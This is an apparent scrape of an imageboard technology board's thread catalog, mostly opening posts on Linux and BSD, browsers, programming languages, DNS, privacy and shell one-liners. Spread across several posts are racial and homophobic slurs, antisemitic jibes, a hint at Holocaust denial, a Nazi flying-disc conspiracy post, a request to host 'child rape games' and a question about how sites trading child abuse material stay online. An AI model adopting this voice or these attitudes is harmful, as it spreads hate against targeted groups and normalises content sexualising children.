Operation High Jump and Admiral Byrd, you've heard of that, right? German flying discs will ensure the transition to a new golden age. An age of truth, love and light. Totally free of satanic influences. I know that it must be inconceivable to American patriots that they will no longer be the leaders of the world. But don't worry, there will be no reason to be better than others. Prepare, the beginning of our spiritual ascension will begin soon. But first POTUS will drain the swamp. ;-)

R: 18 / I: 2 / P: 7 [R] [G] [-]

"Global internet outages"

Most of the places I would normally go to talk about this stuff are down, but this site is running fine and doesn't even appear slow and several other sites, both major and minor, have shown no issues at all. But then some services are completely disabled and a ping won't even come back from the IP. What is this, who's behind it, why is it so selective, and what does it mean for us?

Pic probably related.

R: 16 / I: 0 / P: 7 [R] [G] [-]

Why OpenBSD when FreeBSD does everything?

OpenBSD is only good for legacy hardware and headless servers. You'll end up installing Xorg and a hundred apps anyways so security benefits go down the drain.

FreeBSD supports all your devices, has no gotchas, and is much more performant, while still being more secure than major linux distros.

R: 13 / I: 0 / P: 7 [R] [G] [-]

What if imageboards like 8chan had something like hentai@home to lower bandwidth costs and take the load off the server?

R: 21 / I: 1 / P: 7 [R] [G] [-]

Timezones are a spook

I believe that there should be only three timezones for coordinating for /tech/-related conferences and meethings

Here are the timezones that matters (and also notes on if they have daylight saving time or not)

Timezone 1: American Time

GMT-8 (w/ DST) LA, SanFran, Vancouver

GMT-6 (w/ DST) Austin

GMT-5 (w/ DST) NYC, Boston, Toronto

Timezone 2: European Time

GMT 0 (w/ DST) London, Lisbon

GMT+1 (w/ DST) Amsterdam, Berlin, Prague

GMT+3 Moscow

Timezone 3: Asian Time

GMT+6 Bengalore

GMT+8 Taipei, Singapore, Beijing

GMT+9 Tokyo, Seoul

R: 19 / I: 2 / P: 8 [R] [G] [-]

VLC vs MPV > Which one and why?

I hear this debate all over the place, and I'm pretty intrigued to hear your side, preferences and which one came out superior according to your experience.

Battle of the Media Players: Open Source Meta Edition is underway...

R: 432 / I: 60 / P: 8 [R] [G] [-]

Programming general

Learning a language edition. Let's talk about our troubles and successes.

R: 15 / I: 1 / P: 8 [R] [G] [-]

Steve Burke (Gamers Nexus) is a fucking tool and doesn't know how to review hardware. He's only popular because of (((reddit))) and has a history of posting outright misleading information.

R: 15 / I: 0 / P: 8 [R] [G] [-]


So what is the best free E-mail available?

R: 24 / I: 1 / P: 8 [R] [G] [-]

A new low for VPNs > Fuck Kaspersky

As of a couple of days ago, they will be the only VPN NOT blocked in Russia, because they decided to block any site the Russian government tells them to.


<It's almost as if you don't need it at all!

It's a sad day for privacy standards everywhere...

R: 114 / I: 15 / P: 8 [R] [G] [-]

Press F on Chrome.

tl;dr: Chrome is breaking ublock origin, and umatrix. Google employees in the thread are ignoring performance benchmarks deconstructing their stated reasoning and are instead just forcing the change through.

>"Chrome is deprecating the blocking capabilities of the webRequest API in Manifest V3, not the entire webRequest API (though blocking will still be available to enterprise deployments)."

>"I'd like to extend my thanks to the EFF and others for taking the time to share their feedback with the community. Writeups like these are truly invaluable as they help us understand not only your concerns, but also the context in which those concerns are rooted."

The original thread:




R: 252 / I: 18 / P: 8 [R] [G] [-]

Shell thread

Post your shell commands or ideas for shell commands. I'm compiling a list. Here's what I got so far:


gimpresize(){ input="$1"; res="$2"; output="$3"; gimp -ib "(let* ((image (car (gimp-file-load RUN-INTERACTIVE \"$input\" \"\")))(drawable (car (gimp-image-get-active-layer image))))(gimp-image-scale-full image $res INTERPOLATION-LOHALO)(gimp-file-save RUN-NONINTERACTIVE image drawable \"$output\" \"\"))(gimp-quit 0)";}
# gimpresize input.png 1920\ 1080 output.png

imagemagickresize(){ input="$1"; res="$2"; output="$3"; convert $input -colorspace RGB +sigmoidal-contrast 12.09375 -filter Lanczossharp -distort resize $res -sigmoidal-contrast 12.09375 -colorspace sRGB $output;}
# imagemagickresize input.png 1920x1080 output.png

vidtogif(){ input="$1"; res="$2"; colors="$3"; output="$4"; ffmpeg -i $input -vf palettegen /tmp/palette.png && ffmpeg -i $input -i /tmp/palette.png -lavfi paletteuse $output && gifsicle -b -O3 --resize-width $res --colors $colors -i $output;}
# vidtogif input.webm 640 200 output.gif

vidtowebm(){ input="$1"; videoquality="$2"; audioquality="$3"; output="$4"; ffmpeg -i $input -vcodec libvpx-vp9 -b:v 0 -crf $videoquality -c:a libopus -b:a $audioquality -g 500 -threads 8 $output;}
# vidtowebm input.mp4 40 192K output.webm

vidtomp4(){ input="$1"; videoquality="$2"; audioquality="$3"; output="$4"; ffmpeg -i $input -c:v libx264 -crf $videoquality -profile high -level 5.1 -preset veryslow -pix_fmt yuv420p -c:a aac -b:a $audioquality $output;}
# vidtomp4 input.mkv 20 192K output.mp4

7zipmax(){ archive="$1"; directory="$2"; 7z a -t7z -mx9 -m0=lzma -mfb=273 -md=1024m -ms=on -mqs=on -myx=9 -mmc=200 -mlc=8 $archive $directory;}
# 7zipmax archive.7z directory/

tarmax(){ archive="$1"; directory="$2"; XZ_OPT="--lzma1=preset=9e,dict=1024MB,nice=273,depth=200,lc=4" tar --lzma -cf $archive $directory;}
# tarmax archive.tar.lzma directory/

screenshot(){ scrot -e "meh \$f || sxiv \$f || feh \$f || nomacs \$f && read -erp Upload\? -n1 yn && [ \\\$yn == y ] && curl -F upload=@\$f https://chiru.no";}
# screenshot

waifu2xmax(){ input="$1"; output="$2"; quality=$(identify -verbose $input | grep -oP "(?<=Quality: ).*"); noiselevel=3; [ $quality -gt 95 ] && noiselevel=2; [ $quality -gt 98 ] && noiselevel=1; parameters="-m noise_scale --noise_level $noiselevel --scale_ratio"; [ -z $quality ] && parameters="-m scale --scale_ratio"; iteration=2; while waifu2x-converter-cpp -i $input --force-OpenCL $parameters $iteration -o $output; do ((iteration++)); done;}
# waifu2xmax input.png output.png

mouseaccelerationdisable() { for i in {0..99}; do xinput set-prop $i "libinput Accel Profile Enabled" 0 1; done &> /dev/null;}
# mouseaccelerationdisable

R: 70 / I: 5 / P: 8 [R] [G] [-]

Linux Smartphone General

>Librem 5 dev-kits making calls to each other

>PinePhone dev-kits sent out



I can't wait for PostmarketOS to start making calls on those devices.

Complaining about smartphones thread: >>1045136

R: 76 / I: 8 / P: 8 [R] [G] [-]

Why use C other than legacy codebase support?

It has all the features modern C and C++ devs try to enforce like const by default, type deduction, package management instead of #include, etc

R: 108 / I: 9 / P: 8 [R] [G] [-]

Linux design: standard linux folders

what nigger did invent standard linux folders?

why in the filesystem there is 15 root folders? Windows has few folders, Windows, Program Files, Users

why are their names 3-4 letters that don't tell anything? even MSDOS had 8+3 filenames, why linux uses such shitty names like "dev", "etc", "mnt", "opt", "sbin", "usr", "var"?

what this shit means and why isn't it placed inside one root folder like "System" or "Linux"?

Who designed Linux? What are his skills in systems design? How much time did he spent designing Linux before implementing it? Who has chosen him for linux designer position, what credentials and experience did he have?

R: 53 / I: 2 / P: 8 [R] [G] [-]

Meta-Machine Code

I would like to show off a tool I've created; the included image is an example of the tool with a program I've written loaded; the main page for this tool can be found here:


The page for the only current version of the tool is here; note it is an immature page in comparison:


This is an interactive machine code development environment I've created. The basic idea is each key of the keyboard, decided by position rather than value, is bound to a routine which asks questions until an action can be decided upon. An example is pressing a key for a routine that merely needs two registers in order to complete; you're permitted to enter a register number, the tool won't allow invalid such numbers to be entered at all, it asks again in the same way, and it then writes the finished instruction to the current location; if a name referring to a number was used, that name will likely be displayed instead of the numerical value, varying, and any changes to the name will update the instruction as well.

I wrote this tool in Common Lisp purely because Common Lisp has the necessary primitives. The program is decidedly non-Lispy. I'm planning to write a simpler reimplementation in Ada by the year's end and expect this will be the version that is distributed to package managers and whatnot. Some simple figuring has shown to me that the memory usage for this program, sans any undo and redo mechanism, should be well within an eighth of a megabyte in the general case and below a quarter in all cases.

The tool was borne of my dislike for assemblers. Answers are saved by similar routines and so you can very easily press keys until you find the one you need; you can't touch and feel your way around an assembler. Aside from this, there are also special routines, primarily located on the home row, which control movement, insertion, deletion, jumping around the program space, creating and deleting names, and other necessities.

In contrast to a one or two pass assembler, this is a no-pass tool, as everything must at all times be in a valid state. You can't use a name before it's created; updating a name works modulo its usage size, preventing errors from surpassing limits; and deleting a name merely removes the association, preventing further updates upon changes, among other such measures.

This is a reasonable description of the tool. Currently, only I can use it, because it's not in a friendly state for installation and I only have a correct Dvorak mapping created. I'm also still refining it and removing bugs I've added during this refining. The entire system, including the three libraries I wrote for it, is less than two and a half thousand lines of code.

I've been trying to show this tool to a wider audience, but I've not found much of one yet. Feel free to tell me what you think and ask any questions concerning the tool.

R: 281 / I: 33 / P: 8 [R] [G] [-]

Post sites that don't stink

What are some good sites that respect the client? (regardless of the quality of content on the site)


- Google captcha

- completely non-functional without JS

>crippling penalty:

- banning/captcha-walling Tor or VPN usage

- Cloudflare

- not e2e encrypted

>hard mode:


- aesthetically appealing

>beast mode:

- interactive forum with regular activity

- popular

R: 127 / I: 5 / P: 8 [R] [G] [-]

Project Thread

ITT: Share projects and scripts created by you/anons

1. Hydrus Project (*booru taggins system with IPFS)



2. Guacman Chatbot (a TayAI replacement)


(source code in some file sharing site instead of github)

R: 16 / I: 0 / P: 8 [R] [G] [-]

Mitigating Linux TCP Vulnerabilities with UFW

On June 17, 2019, Netflix released a security bulletin about vulnerabilities in the Linux and FreeBSD kernels. Here we will only discuss the vulnerabilities affecting the Linux kernel and how to apply the mitigations with ufw.

The vulnerabilities discussed are: CVE-2019-11477, CVE-2019-11478 and CVE-2019-11479.

Netflix mentions patches and a choice of mitigations. Here we discuss only type of mitigation.

In the Netflix bulletin, we have mentions of sysctl and iptables. And fortunately, ufw does take care if this for us, albeit in a non-obvious way. The ufw config files are kept in /etc/ufw and that’s where we find before.rules and sysctl.conf.

So we edit sysctl.conf first, and make sure tcp_sack is set to zero.

## Setting this to zero to migtigate CVE-2019-11477, CVE-2019-11478.



R: 184 / I: 14 / P: 8 [R] [G] [-]

OpenBSD as Primary Workstation

Been using linux since hardy, used various forms of it from suse to arch for different applications but now thanks to pledge+chromium it has replaced arch on even my laptop and my private server has run it since I first heard of it. My question is has anyone tried it in a workstation setting?

R: 23 / I: 1 / P: 9 [R] [G] [-]

ITT: we create the most redpilled portfolio of programming languages.

C: low level programming

Haskell: general system programming

HTML (without javascript): web development

r8 and masterb8 to it

R: 122 / I: 8 / P: 9 [R] [G] [-]

X11 Is Quickly Going Into Maintenance Mode, In Favor of Wayland

>Once we are done with [their Wayland improvements] we expect X.org to go into hard maintenance mode fairly quickly. The reality is that X.org is basically maintained by us and thus once we stop paying attention to it there is unlikely to be any major new releases coming out and there might even be some bitrot setting in over time. We will keep an eye on it as we will want to ensure X.org stays supportable until the end of the RHEL8 lifecycle at a minimum, but let this be a friendly notice for everyone who rely the work we do maintaining the Linux graphics stack, get onto Wayland, that is where the future is.



R: 28 / I: 2 / P: 9 [R] [G] [-]

Open Source Payment processors/gateways?

Everything is currently shitting the bed, what are the technicalities behind setting up your own payment processor?

R: 18 / I: 1 / P: 9 [R] [G] [-]

Anonymity Online: 2019 Edition

ITT: we realistically discuss methods of highly anonymous messaging and/or publication (such as imageboards) and, more importantly, how effective they might be against a passive global adversary.


>the users are not under proper targeted surveillance prior to their communication, consider them just privacy-conscious nerds or low-tier criminals

>typical conditions apply

>scope is limited to the Internet, meaning that we assume no spyware exists on the system (unless you wish to debate that all hardwares/OSs are permanently spying)

Opening examples:

1) Anon uses Tor Browser to post her /pol/ essays on an .onion site. They do not enable JS during their visit. Can US agencies help Mossad discover the real name of this dissident?

2) Anon uses his Signal app through a nordic VPN to coordinate a chat group of 500 Hong Kong protesters. Can China find him through the crowd of clones to hijack his phone?

3) Anon uses I2P to download a car. Publishers successfully lobby Trump's government to allow online pirates to be labelled 'economical terrorists' and the FBI is using full capability to hunt them down. Will Anon have to sell his slick new car to hire a lawyer?

>inb4 unironic /pol/

R: 101 / I: 8 / P: 9 [R] [G] [-]

Discussion about paper "Towards a peer-to-peer imageboard"

I'm reading the paper posted by Fredrick Brennan regarding the different approaches of making a decentralized image board and i came to this part.

"In a BitTorrent-like magnet

network, unpopular or old images can fall out of the network over time, but in a

blockchain, all images must be stored forever no matter what they depict."

I think there is a clear winner here being the bit torrent approach, follow the approach most chans have traditionally used that old/inactive images/threads fall out of the ecosystem of the board.

R: 29 / I: 1 / P: 9 [R] [G] [-]

Should I use Python or something else for a general purpose language?

R: 53 / I: 4 / P: 9 [R] [G] [-]

Alternative UTF-8 Letters

I don't know why this isn't more discussed.

Instead of chatting on places with regular easily parsable letters, why not use UTF-8 alternatives that are both easy to read (hopefully very similar so other people don't complain) but harder to parse and analyze?

a) Post character sets that can be used for this

b) Discuss tools/ways to apply them to systems/applications (I've used Autohotkey for this before)

R: 57 / I: 7 / P: 9 [R] [G] [-]

Why do phones suck so much nowadays?

Bought an XA2 to replace my Moto G4 (which has a dodgy camera lens) yesterday, installing LineageOS was borderline impossible cus of their weird partitioning and DRM, I could only use fastboot with USB 2.0 ports, which meant digging out an old laptop, then when I actually figured it out the screen died. It also has an SD tray that takes you 5 minutes to remove even with tweezers, and a bunch of features I don't need like a fingerprint sensors.

I just want a phone that does the job, why overcomplicate the device so much? I'm returning it and I'm just going to get a modded lens replacement.

R: 34 / I: 0 / P: 9 [R] [G] [-]

SHAttering 2 - The second SHAppening

From Collisions to Chosen-Prefix Collisions - Application to Full SHA-1

A chosen-prefix collision attack is a stronger variant of a collision attack, where an arbitrary pair of challenge prefixes are turned into a collision. Chosen-prefix collisions are usually significantly harder to produce than (identical-prefix) collisions, but the practical impact of such an attack is much larger. While many cryptographic constructions rely on collision-resistance for their security proofs, collision attacks are hard to turn into a break of concrete protocols, because the adversary has limited control over the colliding messages. On the other hand, chosen-prefix collisions have been shown to break certificates (by creating a rogue CA) and many internet protocols (TLS, SSH, IPsec).

In this article, we propose new techniques to turn collision attacks into chosen-prefix collision attacks. Our strategy is composed of two phases: first, a birthday search that aims at taking the random chaining variable difference (due to the chosen-prefix model) to a set of pre-defined target differences. Then, using a multi-block approach, carefully analysing the clustering effect, we map this new chaining variable difference to a colliding pair of states using techniques developed for collision attacks.

We apply those techniques to MD5 and SHA1, and obtain improved attacks. In particular, we have a chosen-prefix collision attack against SHA1 with complexity between 266.9

and 269.4 (depending on assumptions about the cost of finding near-collision blocks), while the best-known attack has complexity 277.1. This is within a small factor of the complexity of the classical collision attack on SHA1 (estimated as 264.7). This represents yet another warning that industries and users have to move away from using SHA1 as soon as possible.


Post yfw Bittorent and Git still use SHA1

R: 51 / I: 8 / P: 9 [R] [G] [-]

/aosg/ - Alternative OS General

Welcome to /aosg/, where we discuss operating systems other than Windows, GNU/Linux distributions, and macOS.

*As this is a new general, it's heavily underwhelming and incomplete! Improvements, tips, and contributions are more than welcome!*







>Notable systems:

-Haiku: A system inspired by BeOS that's starting to gain more popularity. As of writing, a Firefox port is underway. https://www.haiku-os.org/

-ReactOS: A binary-compatible OS that aims to just werk with Windows programs. https://reactos.org/

-9front: A fork of Plan 9 from Bell Labs that has advantages over the original system. http://9front.org/

Pic: 9front's SKIN OF EVIL release

R: 24 / I: 2 / P: 9 [R] [G] [-]

Is github a free speech git repository or should I move my gamedev github to an alternative?

I want to make some politically incorrect games about jews, niggers and even make child rape games.

Is github safe for this or will they delete my github because of that?

R: 20 / I: 1 / P: 9 [R] [G] [-]


Which app do you prefer to use? What are the advantages and disadvantages of your apps?

I personally use Clover

+It has a very intuitive design, unlike other clients. Browslng, posting gets really comfortable.

+ Themes are nice

- Some features missing for 8ch

- Only supports halfchan and 8ch

R: 15 / I: 2 / P: 9 [R] [G] [-]



>Facebook, Whatsapp and Instagram reporting problems sending and receiving images.



R: 220 / I: 69 / P: 9 [R] [G] [-]

Riemann hypothesis

I have this disproof of the Riemann hypothesis and I want to use it to come up with the general solution to RSA encryption, and actually all prime factorization encryption algorithms. After disproving RH, what is the next step? Also, thread about RH.

R: 34 / I: 0 / P: 9 [R] [G] [-]

How do obviously illegal sites stay up on the clearnet?

Take the triforce chans and masterchan to an extent. They operate in the thinnest of gray areas and are actively used to trade CP. And yet despite all that they keep coming back. The operators are never arrested, the servers are never really touched. All that happens if that their domains get shut down and they play whack-a-mole with global law enforcement. How? They seem to have a reverse proxy or IP trading service called Incrediserve, and I imagine they're probably hosted on some shady Ecatel, Quasi network, bullet proof hosts. But still, how do they stay online and out of jail while obviously hosting child porn and borderline child porn?

R: 90 / I: 15 / P: 10 [R] [G] [-]


>ctards and lispcucks still don't know what the best language is

Have you mastered the STACK, yet maties?





R: 33 / I: 1 / P: 10 [R] [G] [-]

Javascript has the big gay, any good alternatives for a frelancer?

Webdev in gen is full of sodomites, shitskins, and sjws and the whole state of it fucking repulsive. Python seems just as fucked along with most low barrier languages.

Not asking for career advice, but I was laid off a year ago and I'm limited to corp2corp/freelance work. Unfortunately, ReactJS remote work seems in high demand so I may have to say fuckit and just do that. Are any of you anons making any money with Haskell, C, Erlang, or Kotlin?

R: 20 / I: 2 / P: 10 [R] [G] [-]

Free hosted web pages

Put any content you like.

No logs, no filters.


R: 15 / I: 4 / P: 10 [R] [G] [-]

/tech/'s opinion of the current state of hp

What's /tech/'s opinion about the current state of hp?

R: 311 / I: 33 / P: 10 [R] [G] [-]


Old thread hit 400 replies: >>996935

Nanochan is a tor only imageboard written in lua:


Source code:


Changes since the last thread:

>the old v2 onion address has been redirected to the new v3 address

>is there gonna be another /tech/ thread needed after the current one hits 400?

<I'm not going to make one. In retrospect I actually think it was a mistake to advertise on pigchan in the first place

Discuss alternative imageboards, web dev best practices, and call each other faggots

R: 347 / I: 62 / P: 10 [R] [G] [-]

Audio Hardware Thread


What AMPs are you faggots using? I'll be getting an HD 6XX soon and is currently looking for an AMP. I'm currently looking at the Fiio E10K and the K3 but don't know the difference between the two. Any amps you'd recommend?

R: 25 / I: 4 / P: 10 [R] [G] [-]

Yahoo nukes classic mail, leaving only js bloat

>Starting January 31, 2019, the Classic version of Yahoo Mail will no longer be available. At that time, you’ll be upgraded to the latest version of Yahoo Mail or Basic Mail, depending on your browser’s compatibility



I'm a few months late, but they switch to js pozmail finally happened. Do you guys know of any email service that isn't js and isn't google?

R: 76 / I: 16 / P: 10 [R] [G] [-]

8chan served with search warrant

California is filing it in response to the Synagogue and Mosque attacks, they've been keeping a real close eye on us.

Thanks a fuckton /pol/.

R: 14 / I: 1 / P: 10 [R] [G] [-]

The absolute state of the web

Who was the genius san francisco UX designer behind this decision?

R: 11 / I: 3 / P: 10 [R] [G] [-]

Encryption rights in the USA

Share on Facebook

Share on Twitter

Senior Trump administration officials met on Wednesday to discuss whether to seek legislation prohibiting tech companies from using forms of encryption that law enforcement can’t break — a provocative step that would reopen a long-running feud between federal authorities and Silicon Valley.

The encryption challenge, which the government calls “going dark,” was the focus of a National Security Council meeting Wednesday morning that included the No. 2 officials from several key agencies, according to three people familiar with the matter.

Senior officials debated whether to ask Congress to effectively outlaw end-to-end encryption, which scrambles data so that only its sender and recipient can read it, these people told POLITICO. Tech companies like Apple, Google and Facebook have increasingly built end-to-end encryption into their products and software in recent years — billing it as a privacy and security feature but frustrating authorities investigating terrorism, drug trafficking and child pornography.

“The two paths were to either put out a statement or a general position on encryption, and [say] that they would continue to work on a solution, or to ask Congress for legislation,” said one of the people.

But the previously unreported meeting of the NSC’s so-called Deputies Committee did not produce a decision, the people said.


The USA has strong freedom of speech protections - it is still legal to question the Holocaust narrative in the USA, unlike several other countries.

The USA also has a tradition of anonymous political speech. If the USA falls, I don't have great hopes for any other country.

R: 119 / I: 12 / P: 10 [R] [G] [-]

So what's your opinion on Firefox and do you use it?

I find it fucking slow and laggy even on the fastest NVMe SSD that money can buy.

But most of all... I just want to know if people on here are as absolutely cucked as 4chans tech board, which basically has a cult following for SJW Mozilla shit - It's like being on Reddit.

R: 34 / I: 0 / P: 10 [R] [G] [-]

Gentoo's package manager

Why is Gentoo's package manager made in Python?

>Almost every other package manager is in C

>Python is known for being slow as hell

>Ebuilds are already scripts themselves

>Devs don't seem to state a reason for doing this


I just want to know why it is written in Python and why it has not been rewritten

Pic related btw.

R: 58 / I: 3 / P: 10 [R] [G] [-]

Abandonded FOSS

Is there any software you like but it's abandonded or has very low commit counts?

List it here and maybe anons can help out.

R: 14 / I: 2 / P: 10 [R] [G] [-]


R: 16 / I: 0 / P: 10 [R] [G] [-]

Best file naming convention?

How do you name your files? How do you do spaces? Do you capitalize letters? What's the best naming conventions for easy searchability and readability, and that is compatible in both *nix and windows systems? Thank you.

R: 175 / I: 8 / P: 11 [R] [G] [-]

Go core devs on suicide watch

TL;DR: My GF wrote a coroutine library whose context switches are more than 20 times faster than Go's goroutine scheduler and basically Go is cringe tier.

My GF wrote a C++ coroutine library. When she benchmarked it on her Intel(R) Core(TM) i7-8700 CPU (3.20GHz) on 12 threads, she achieved a system-wide throughput of 166MHz (6ns) for coroutine context switches, while the equivalent Go code (also 12 threads, same amount of goroutines and iterations per goroutine) performed miserably at 7MHz (140ns). When compiled with gccgo -O3 it was even worse at 3.8MHz (263ns). This means her implementation of coroutines is more than 20 times faster. How can you fuck up the main feature of a language that bad, considering Google had a whole team of developers working on it, and she did this on her own?

Benchmark suite repo: https://github.com/sm2coin/libcr-test

Go benchmark code: excuse the shitty code

package main;

func loop(i int, finish chan int) {
for i > 0 {
i = i -1;
finish <- 1;

func main() {
iterations := 10000 * 20;
messages := make(chan int);
start := time.Now();
coroutines := 600;
for i := 0; i < coroutines; i++ {
go loop(iterations, messages);

for i := 0; i < coroutines; i++ {

duration := time.Since(start);
fmt.Print( float64(coroutines * iterations) / duration.Seconds() / 1000000);
fmt.Print(float64(duration.Nanoseconds()) / float64(coroutines * iterations));

Rate her project.

Lel I'm tired and I bet I fucked up the OP ;^)

R: 33 / I: 7 / P: 11 [R] [G] [-]

NSA contributing to Coreboot

>The US National Security Agency (NSA) has developers contributing to the Coreboot project.

>Eugene Myers of the NSA under the Information Assurance Research, NSA/CSS Research Directorate, has been leading some work on an STM/PE implementation for Coreboot.

>This implementation is for an SMI Transfer Monitor (STM) to offer protected execution services on x86 by serving as a hypervisor in x86 SMM mode. The NSA work extends STM to support additional virtual machines and paired with an integrity measurement engine can offer greater security to the system.


R: 27 / I: 4 / P: 11 [R] [G] [-]

Debian has an "anti-harassment" team

Have you ever wondered how weird trannies build their resumes enough to land top tier tech firm jobs? Just join Debian's anti-harassment team and up your git commit counts with useless bullshit!

>After ending out 2019 by seeking the successful removal of a package over its name and logo, the Debian Anti-Harassment Team saw initially a busy 2019 but work has leveled out while they are working on making it easier to bring them aware of situations via a web-based form.

>The Debian Anti-Harassment Team issued a new report on their work so far for 2019. They've got involved in an incident over inappropriate language, monitoring mailing list discussions but generally taking no actions, and working on several other reports not yet elaborated on.

< * Added a new member (thanks Sledge!);

< * Follow up around community discussions;

< * Followed discussions on mailing lists and responded officially to several messages, but generally took no action;

< * Responded to one incident of inappropriate language;

< * Received several reports we have not yet closed.

< * Worked with several community members to help them proactively be more inclusive in their communications;

< * Handled one ongoing discussion around behavior of an individual

>The team meanwhile has been working on alternative names to the "Debian Anti-Harassment Team", they are doing a sprint this month, they are testing a new web-based system for reporting harassment issues, and they have a few new submissions for volunteers to join their team.


R: 114 / I: 16 / P: 11 [R] [G] [-]

4 years of Rust

On May 15th, 2015, Rust was released to the world! After 5 years of open development (and a couple of years of sketching before that), we finally hit the button on making the

attempt to create a new systems programming language a serious effort!

It’s easy to look back on the pre-1.0 times and cherish them for being the wild times of language development and fun research. Features were added and cut, syntax and keywords were tried, and before 1.0, there was a big clean-up that removed a lot of the standard library. For fun, you can check Niko’s blog post on how Rust's object system works, Marijn Haverbeke’s talk on features that never made it close to 1.0 or even the introductory slides about Servo, which present a language looking very different from today.

Releasing Rust with stability guarantees also meant putting a stop to large visible changes. The face of Rust is still very similar to Rust 1.0. Even with the changes from last year’s 2018 Edition, Rust is still very recognizable as what it was in 2015. That steadiness hides that the time of Rust’s fastest development and growth is now. With the stability of the language and easy upgrades as a base, a ton of new features have been built. We’ve seen a bunch of achievements in the last year:

>We have been StackOverflow’s “Most loved programming language” 4 consecutive years in a row

>We opened up a whole new area of development for stable Rust: embedded development

>Rust+WASM went from an experiment to a usable product, making rustc the first compiler with focus on supporting WASM

>We shipped a new language edition: Rust 2018

>Crates.io passed a billion downloads and has over 25,000 crates available

>There’s now over 100 meetups around the world, in 42 countries

>6(!) new conferences were spun up (RustRush, RustCon Asia, Oxidize, Rust LATAM, Colorado Gold Rust, RustLab Italy)

This list could go on and on. While the time before and after release was a time where language changes had huge impact how Rust is perceived, it's becoming more and more important what people start building in and around it. This includes projects like whole game engines, but also many small, helpful libraries, meetup formats, tutorials other educational material. Birthdays are a great time to take a look back over the last year and see the happy parts!

Rust would be nothing, and especially not winning prizes, without its community. Community happens everywhere! We would like to thank everyone for being along on this ride, from team members to small scale contributors to people just checking the language out and finding interest in it. Your interest and curiosity is what makes the Rust community an enjoyable place to be. Some meetups are running birthday parties today to which everyone is invited. If you are not attending one, you can take the chance to celebrate in any other fashion: maybe show us a picture of what you are currently working on or talk about what excites you. If you want to take it to social media, consider tagging our Twitter account or using the hashtag #rustbirthday.



R: 21 / I: 1 / P: 11 [R] [G] [-]

/networking security/

Which DNS do you use?

Which router did you buy? Is there even a point to buying a router?

Best firewall on gnu/linux for a brainlet?

R: 71 / I: 9 / P: 11 [R] [G] [-]

Wanting to reinstall your OS after using it for a certain amount of time

See subject

Is there a name for this psychological phenomenon? Like the need to just want to clean everything up and start fresh again? Is it just caused by general OS rot and dependency hell? Are there ways to solve this?

R: 68 / I: 5 / P: 11 [R] [G] [-]

DNS thread

G'day /tech/, recently I've been searching for good DNS providers and would like to gather some opinions on which on to chose. Currently I'm torn between open-DNS and Cloudflare-DNS but I'd appreciate alternate options.

R: 52 / I: 4 / P: 11 [R] [G] [-]

r/The_Donald has been quarantined

Discuss free speech alternatives to leddit.


R: 12 / I: 1 / P: 11 [R] [G] [-]

Why do sheep still like apple?

I had a talk with a few people and when i even say 1 thing negative about apple, i get bombarded with iTS sOOO mAnY yeARS aGo or it ISNT thAT bAd *cough* https://www.youtube.com/watch?v=AUaJ8pDlxi8 *cough*. Even with all their fuckups, why do the fuck people still like apple.

R: 21 / I: 1 / P: 11 [R] [G] [-]

Android Blacklist > Which phones should I stay away from?

Call me a BotFag for actually making this thread, as I already know owning an Android is a terminal illness (all phones are, so it's meaningless), but if you had a list of Android phones/manufacturers you'd rather stay from, and some you would actually recommend, I'd be inclined to see your list and why.

These are the rules if you want to recommend a Good Android Phone:

>No Chinese Companies (Taiwan doesn't count)

>No Foreign Companies bought out by China

>No absence of Headjack (obvious, and also de-facto no phones thinner than tin-foil)

>Easy Root Activation Process

>Has to at least work (no processors under quad-core)

>Bonus points for ability to change the OS

But hey, what do I know, I'm just a dumb-ass for not wanting to look it up, entertain me...

R: 11 / I: 0 / P: 11 [R] [G] [-]

Qwant, yay or nay?

So I heard about qwant some time ago, and been trying it out and I have to admit I really like it. They claim that they are privacy focused and thus far I've not found a reason not to believe them (I mean I don't trust anyone completely).

Anyone here got some experience, postive or negative to say about it?

I like that it's not jew owned duckduck and the results are better than searchx et.

R: 55 / I: 11 / P: 11 [R] [G] [-]

Firefox 67 > Hate it or Despise it?

This new piece of Chromeware comes with:

>A new Sync Button directly ripping off the Chrome Account button.

>New rules so that Add Ons are disabled by default on Private Mode.

>Saves Password even on Private Mode.

I rate it a: “Switch to Basilisk/Pale Moon you Dumbass Court Monkey!” out of 10.

R: 150 / I: 23 / P: 11 [R] [G] [-]

hidden gems

What is some underrated/unknown software that you use a lot?

i'll start:




R: 21 / I: 1 / P: 11 [R] [G] [-]

say something nice about Lennart

meep meep do it faggot tbh no homo

R: 38 / I: 6 / P: 12 [R] [G] [-]

(Effectively) Power-free computing

Alright so the CIA or your choice of any local three-letter agency is probably going to lynch us for discussing this kind of technology, but I've been looking into hardware components which I think are being under-utilised. What kinds of components? The sorts that could be used to do general desktop computing without bowing down to the Electric Jew. With some of these concepts put together, you could probably shitpost on 8ch with a hand-crank powered computer. Here are my findings:

Non-volatile RAM:


RAM which can store memory without persistent power. An SSD can be utilised as NVRAM, but there's been other methods to try to implement this. With an ideal implementation, powering off your computer would be equivalent to putting it in a hibernation mode.



You probably associate this with e-Readers, and therefore annoying harry potter-reading single mothers but the truth is, these things are incredible. If it weren't for the costs associated with the other hardware of an e-reader, they could stay charged indefinitely. As you know, the thing which sets it apart from other low-power displays used in calculators and the like are viewing angle, and the fact that rather than blanking out when the power is cut, they have to actually wipe themselves clean. The refresh rate is terrible though, so this will be pretty grating with conventional, line-by-line text processing.




Power Over Ethernet:


I'll admit this is cheating, but for most interesting tasks involving a computer, you'll need networking anyway.

If the requirements of having an Ethernet port at all are too steep, then we could scrap this and build a modem into the computer instead. If we do this, we have to account for the electricity the external phone uses as well.

Human Power:



I alluded to this earlier, and you might've taken it as shitposting. Just read the sales pitch, and you'll see that it's more than enough to power the kind of computer we're looking at.

Plug Computer Form Factor:


Doesn't exactly align with the objective, since you can't really just power them off at will, but their low wattage (generally lower than the Commodore 64, apparently) still makes them useful if you need a computer that's active 24/7. You could use it for to run a bittorrent program, and maybe a web server I guess.

The ideal goal is to have a computer that consumes 0 watts in an idle state (idle meaning, any time you're busy reading text for more than ~4 seconds), and still a negligble amount of power when it's actually being used. This would mean that the computer is actually powered "off" for most of the time it's in use.

Is there anything stopping this from happening? I don't know whether you can just stop and start CPUs the same way you can with the RAM/monitor.

R: 40 / I: 3 / P: 12 [R] [G] [-]


Getting a high paid job in tech requires a perfect CV, so let's discuss perfect CVs.

How do you make a perfect CV? Is it okay to lie on it? How do you structure it? Do you drown it in buzzwords?

Is there any tech that aids with creating perfect CVs?

R: 10 / I: 0 / P: 12 [R] [G] [-]

Encryption & Co.

Hey lads

